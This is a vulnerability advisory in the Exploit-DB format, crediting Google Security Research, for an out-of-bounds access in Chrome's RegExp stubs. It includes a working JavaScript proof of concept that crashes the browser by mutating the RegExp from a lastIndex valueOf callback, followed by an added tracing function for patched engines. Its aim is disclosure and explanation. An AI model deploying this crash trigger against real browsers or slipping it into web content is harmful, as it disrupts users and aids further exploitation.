Google Chrome - Out-of-Bounds Access in RegExp Stubs

EDB-ID: 42286
Author: Google Security Research
Published: 2017-06-30
Type: DoS
Platform: Multiple
Aliases: N/A
Advisory/Source: Link
Tags: Out Of Bounds
Vulnerable App: N/A

A minimal PoC follows; two full PoCs (one for test and one for exec) are attached to the original report. The trigger is the lastIndex object: RegExp.prototype.exec converts lastIndex with ToLength, which invokes the user-supplied valueOf while the RegExp stub is still running. The callback adds 100 named properties to the RegExp so that it transitions to dictionary mode, after which the object layout the stub assumed on entry is no longer valid.

var re;
function f(){
  // Runs inside exec, from ToLength(lastIndex).
  for(var i = 0; i < 100; i++){
    re["test" + i] = 0x77777777; // make a dict
  }
  return 0;
}

re = /-/g;
var str = '2016-01-02';
re.lastIndex = {valueOf : f};
result = re.exec(str);

This PoC crashes on google-chrome-beta on Linux.
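The following is an added example, not code from the original report, that makes the re-entrancy window visible on a patched engine. It wraps the same trick in a function that records the order of events and what exec does with the receiver after the callback has mutated it (the property names p0..p99 and the value 7 written to lastIndex are arbitrary choices for the demonstration). Because the builtin fetched the lastIndex object before calling valueOf, the value the callback later stores in lastIndex is ignored for the match itself; everything the stub read before the callback is stale afterwards, which is exactly the assumption the vulnerable stubs got wrong.

```javascript
// Added example (not part of the original advisory): observe the user-JS
// callback that RegExp.prototype.exec makes through ToLength(lastIndex).
// pattern/flags/input are hypothetical sample values chosen by the caller.
function traceLastIndexReentrancy(pattern, flags, input) {
  var trace = [];
  var re = new RegExp(pattern, flags);

  re.lastIndex = {
    valueOf: function () {
      trace.push('valueOf:start');
      // Mutate the receiver from inside the builtin, as the PoC does:
      // enough named properties to push the RegExp into dictionary mode.
      for (var i = 0; i < 100; i++) {
        re['p' + i] = 0x77777777;
      }
      // Overwrite lastIndex while the builtin still holds the value it
      // fetched a moment ago; the match below must not see this write.
      re.lastIndex = 7;
      trace.push('valueOf:end');
      return 0; // ToLength(0) === 0: search from the start of input
    }
  };

  trace.push('exec:call');
  var m = re.exec(input);
  trace.push('exec:return');

  return {
    trace: trace.join(','),
    matchIndex: m ? m.index : -1,
    matched: m ? m[0] : null,
    // For a global RegExp exec stores the match end here; for a non-global
    // one it leaves whatever the callback wrote.
    lastIndexAfter: re.lastIndex,
    // lastIndex itself is non-enumerable, so only the added properties count.
    addedProps: Object.keys(re).filter(function (k) {
      return k.charAt(0) === 'p';
    }).length
  };
}

// Sample call on constructed input matching the PoC:
//   traceLastIndexReentrancy('-', 'g', '2016-01-02')
```

On a patched engine both the global and non-global calls return normally with the match at index 4; the dictionary-mode transition inside the callback is the state the vulnerable stub could not cope with.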
